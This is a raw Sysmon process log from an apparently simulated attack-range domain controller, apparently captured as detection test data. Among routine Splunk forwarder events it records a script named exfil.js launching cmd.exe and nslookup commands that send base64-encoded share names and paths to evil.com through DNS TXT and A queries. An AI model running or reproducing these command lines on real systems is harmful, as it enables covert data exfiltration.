2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069902Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:22.335{A8622C2F-59F2-6078-950E-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069887Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:20.413{A8622C2F-59F0-6078-940E-00000000AE01}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069877Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:19.840{A8622C2F-59EF-6078-930E-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069865Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:19.265{A8622C2F-59EF-6078-920E-00000000AE01}6076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069855Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:17.499{A8622C2F-59ED-6078-910E-00000000AE01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:16.816{A8622C2F-59EC-6078-900E-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000069832Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:16.150{A8622C2F-59EC-6078-8F0E-00000000AE01}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069791Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:05.486{A8622C2F-59E1-6078-8E0E-00000000AE01}1348C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59E1-6078-8C0E-00000000AE01}6720C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsls.tmp 2>&1 154100x800000000000000069780Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:05.457{A8622C2F-59E1-6078-8C0E-00000000AE01}6720C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 
-retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsls.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069727Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:53.076{A8622C2F-59D5-6078-8B0E-00000000AE01}6660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59D5-6078-890E-00000000AE01}1800C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnvacxv.tmp 2>&1 154100x800000000000000069716Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:53.048{A8622C2F-59D5-6078-890E-00000000AE01}1800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnvacxv.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:35.392{A8622C2F-59C3-6078-880E-00000000AE01}3904C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59C3-6078-860E-00000000AE01}5344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlckwxq.tmp 2>&1 154100x800000000000000069639Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:35.364{A8622C2F-59C3-6078-860E-00000000AE01}5344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlckwxq.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069589Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:22.982{A8622C2F-59B6-6078-850E-00000000AE01}6804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59B6-6078-830E-00000000AE01}3916C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlifcr.tmp 2>&1 154100x800000000000000069578Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:22.953{A8622C2F-59B6-6078-830E-00000000AE01}3916C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlifcr.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:22.317{A8622C2F-59B6-6078-820E-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069545Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:20.564{A8622C2F-59B4-6078-810E-00000000AE01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069535Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:20:19.944{A8622C2F-59B3-6078-800E-00000000AE01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:19.262{A8622C2F-59B3-6078-7F0E-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:17.324{A8622C2F-59B1-6078-7E0E-00000000AE01}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069498Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:16.644{A8622C2F-59B0-6078-7D0E-00000000AE01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069488Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:16.129{A8622C2F-59B0-6078-7C0E-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000069445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:05.319{A8622C2F-59A5-6078-7B0E-00000000AE01}3176C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59A5-6078-790E-00000000AE01}3868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgwljl.tmp 2>&1 154100x800000000000000069434Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:05.291{A8622C2F-59A5-6078-790E-00000000AE01}3868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgwljl.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:52.896{A8622C2F-5998-6078-780E-00000000AE01}1476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft 
Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5998-6078-760E-00000000AE01}636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlduh.tmp 2>&1 154100x800000000000000069372Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:52.868{A8622C2F-5998-6078-760E-00000000AE01}636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlduh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069292Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:35.217{A8622C2F-5987-6078-750E-00000000AE01}4268C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5987-6078-730E-00000000AE01}6824C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsfc.tmp 2>&1 154100x800000000000000069281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:35.188{A8622C2F-5987-6078-730E-00000000AE01}6824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsfc.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:22.810{A8622C2F-597A-6078-720E-00000000AE01}5308C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-597A-6078-700E-00000000AE01}6240C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwfmmxo.tmp 2>&1 154100x800000000000000069220Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:22.782{A8622C2F-597A-6078-700E-00000000AE01}6240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwfmmxo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" 